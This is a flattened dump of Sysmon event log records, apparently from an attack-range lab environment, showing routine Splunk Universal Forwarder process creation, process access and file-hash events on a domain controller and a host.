AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D8772A367244B2E3457355D61497CD9,SHA256=AF436A24C3B436B1230E7937A4F231F20AAF37DF8E4129F04DD2FB143F5A918F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:49.983{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=823AC3E179285AFBC14812CFFBC35288,SHA256=5A0F4C165E5786A54DB58B37AF59C26C9F78401C225FE184DC83F7CEA1260693,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808401Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:49.476{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EEDF9C786190D76667737AE95BCBE68,SHA256=7663186A186DFBA801CB90B6806B40351197DFDBCB04467FC84DC83C2022F2CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:41.657{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51089-false10.0.1.12-8000- 23542300x8000000000000000808402Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:50.476{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70192CA4FEC7454AE2F8232933C0E195,SHA256=92C2F4731609F266B4EC0AC95F9145B06747AC0A79669BE3D580253AF27328D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.964{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C2-60EB-5E7D-00000000CF01}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.948{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5C2-60EB-5E7D-00000000CF01}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.948{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C2-60EB-5E7D-00000000CF01}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.949{466BC892-F5C2-60EB-5E7D-00000000CF01}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.533{466BC892-F5C2-60EB-5D7D-00000000CF01}95322660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C2-60EB-5D7D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F5C2-60EB-5D7D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C2-60EB-5D7D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.265{466BC892-F5C2-60EB-5D7D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808403Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:51.476{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DACBB4C2952019B753796B999BE396CA,SHA256=366AE49A23B8B8A6EB0E0A2F2FDB67C44D21F60260100D9369D40873338BF602,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.663{466BC892-F5C3-60EB-5F7D-00000000CF01}49569228C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C3-60EB-5F7D-00000000CF01}4956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5C3-60EB-5F7D-00000000CF01}4956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C3-60EB-5F7D-00000000CF01}4956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.449{466BC892-F5C3-60EB-5F7D-00000000CF01}4956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 